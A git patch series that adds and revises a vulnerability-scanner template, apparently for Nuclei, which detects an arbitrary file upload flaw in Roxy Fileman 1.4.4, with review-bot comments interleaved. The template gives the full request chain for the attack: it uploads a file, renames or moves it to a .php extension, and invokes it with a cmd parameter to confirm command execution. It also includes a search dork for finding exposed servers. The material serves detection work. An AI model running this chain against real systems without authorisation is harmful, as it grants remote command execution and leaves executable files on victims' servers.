From 5acefb95ae5f193131b1a34a34650f8151904ad3 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Tue, 16 Aug 2022 13:08:09 +0530
Subject: [PATCH 1/3] Create roxyfileman-fileupload.yaml
---
 misconfiguration/roxyfileman-fileupload.yaml | 105 +++++++++++++++++++
 1 file changed, 105 insertions(+)
 create mode 100644 misconfiguration/roxyfileman-fileupload.yaml
diff --git a/misconfiguration/roxyfileman-fileupload.yaml b/misconfiguration/roxyfileman-fileupload.yaml
new file mode 100644
index 0000000000..39635a54db
--- /dev/null
+++ b/misconfiguration/roxyfileman-fileupload.yaml
@@ -0,0 +1,105 @@ +id: roxyfileman-fileupload + +info: + name: Roxy Fileman 1.4.4 - Arbitrary File Upload + author: DhiyaneshDK + severity: critical + description: | + The Roxy File Manager has a configuration setting named FORBIDDEN_UPLOADS,which keeps a list of forbidden file extensions that the application will not allow to be uploaded. This configuration setting is also checked when renaming an existing file to a new file extension.It is possible to bypass this check and rename already uploaded files to any extension, using the move function as this function does not perform any checks. + reference: + - https://www.exploit-db.com/exploits/39963 + metadata: + verified: "true" + google-dork: intitle:"Roxy file manager" + tags: roxy,fileman,rce,fileupload + +requests: + - raw: + - | + POST /php/upload.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6rbEqFAMRkE0RAB7 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 + Sec-Ch-Ua-Platform: "macOS" + Origin: {{BaseURL}} + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 + + ------WebKitFormBoundary6rbEqFAMRkE0RAB7 + Content-Disposition: form-data; name="action" + + upload + ------WebKitFormBoundary6rbEqFAMRkE0RAB7 + Content-Disposition: form-data; name="method" + + ajax + ------WebKitFormBoundary6rbEqFAMRkE0RAB7 + Content-Disposition: form-data; name="d" + + /app/Uploads + ------WebKitFormBoundary6rbEqFAMRkE0RAB7 + Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.jpg" + Content-Type: image/jpeg + + + + ------WebKitFormBoundary6rbEqFAMRkE0RAB7-- + + - | + POST /php/renamefile.php?f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n={{randstr}}.php HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: 
XMLHttpRequest + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 + Sec-Ch-Ua-Platform: "macOS" + Origin: {{BaseURL}} + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 + + f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n={{randstr}}.php + + - | + POST /php/movefile.php?f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n=%2Fapp%2FUploads%2F{{randstr}}.php HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 + Sec-Ch-Ua-Platform: "macOS" + Origin: {{BaseURL}} + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 + + f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n=%2Fapp%2FUploads%2F{{randstr}}.php + + - | + GET /Uploads/{{randstr}}.php?cmd=id HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "uid=" + - "gid=" + - "groups=" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 02c6174964a0a54c24f8cbb6c61d98ced7e929f0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 23 Aug 2022 09:55:32 +0530 Subject: [PATCH 2/3] Update roxyfileman-fileupload.yaml --- misconfiguration/roxyfileman-fileupload.yaml | 33 +++----------------- 1 file changed, 5 insertions(+), 28 deletions(-) diff --git a/misconfiguration/roxyfileman-fileupload.yaml b/misconfiguration/roxyfileman-fileupload.yaml index 39635a54db..8846525ba7 100644 --- a/misconfiguration/roxyfileman-fileupload.yaml +++ b/misconfiguration/roxyfileman-fileupload.yaml 
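Review bot: The `info` block never tells an operator that a positive scan leaves an executable artifact on the target: the rename and move requests both pass `n=` ending in `{{randstr}}.php`, the final request fetches `/Uploads/{{randstr}}.php`, and no later request removes that file. Extend `description` with a sentence such as `The check uploads a file and renames it to a .php extension; the renamed file stays in the upload directory after the scan and must be removed by the operator.` and add a `remediation` line, e.g. `remediation: Apply the FORBIDDEN_UPLOADS extension check to the move and rename handlers as well, and configure the upload directory so the web server does not execute scripts stored there.` A `classification` entry with `cwe-id: CWE-434` would also let consumers group this with other unrestricted-upload findings. Two typos in the description while here: `FORBIDDEN_UPLOADS,which` and `extension.It` are each missing a space. The same missing documentation applies to the second commit's hunks, whose `intrusive` tag is right but whose description stays silent about the leftover file.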
@@ -11,21 +11,14 @@ info:
 metadata:
 verified: "true"
 google-dork: intitle:"Roxy file manager"
- tags: roxy,fileman,rce,fileupload
+ tags: roxy,fileman,rce,upload,intrusive
 
 requests:
 - raw:
 - |
 POST /php/upload.php HTTP/1.1
 Host: {{Hostname}}
- Accept: */*
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6rbEqFAMRkE0RAB7
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
- Sec-Ch-Ua-Platform: "macOS"
- Origin: {{BaseURL}}
- Referer: {{BaseURL}}
- Accept-Encoding: gzip, deflate
- Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
 
 ------WebKitFormBoundary6rbEqFAMRkE0RAB7
 Content-Disposition: form-data; name="action"
@@ -52,35 +45,21 @@ requests: - | POST /php/renamefile.php?f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n={{randstr}}.php HTTP/1.1 Host: {{Hostname}} - Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 - Sec-Ch-Ua-Platform: "macOS" - Origin: {{BaseURL}} - Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n={{randstr}}.php - | POST /php/movefile.php?f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n=%2Fapp%2FUploads%2F{{randstr}}.php HTTP/1.1 Host: {{Hostname}} - Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 - Sec-Ch-Ua-Platform: "macOS" - Origin: {{BaseURL}} - Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n=%2Fapp%2FUploads%2F{{randstr}}.php - | - GET /Uploads/{{randstr}}.php?cmd=id HTTP/1.1 + GET /Uploads/{{randstr}}.php?cmd=echo+"roxyfileman"+|+rev HTTP/1.1 Host: {{Hostname}} cookie-reuse: true @@ -88,12 +67,10 @@ requests: max-redirects: 2 matchers-condition: and matchers: - - type: word + - type: regex part: body - words: - - "uid=" - - "gid=" - - "groups=" + regex: + - "namelifyxor" - type: word part: header From 5cf317ff07ff3f679da5dcaaf899d1380b5314c7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 23 Aug 2022 10:03:40 +0530 Subject: [PATCH 3/3] Update roxyfileman-fileupload.yaml --- misconfiguration/roxyfileman-fileupload.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
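Review bot: In the `@@ -88,12 +67,10 @@` hunk the new body matcher is declared `type: regex`, but its only pattern, `"namelifyxor"`, is a plain literal with no metacharacters, so `type: word` expresses the same substring check without regex semantics and matches the form of the header matcher that follows it; change `- type: regex` to `- type: word` and `regex:` to `words:`. The `words:` form also keeps the marker from being re-read as a pattern if the echoed string is ever changed to contain `.` or `+`.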
diff --git a/misconfiguration/roxyfileman-fileupload.yaml b/misconfiguration/roxyfileman-fileupload.yaml
index 8846525ba7..cbcb05559f 100644
--- a/misconfiguration/roxyfileman-fileupload.yaml
+++ b/misconfiguration/roxyfileman-fileupload.yaml
@@ -11,7 +11,7 @@ info:
 metadata:
 verified: "true"
 google-dork: intitle:"Roxy file manager"
- tags: roxy,fileman,rce,upload,intrusive
+ tags: roxy,fileman,rce,upload,intrusive,misconfig
 
 requests:
 - raw: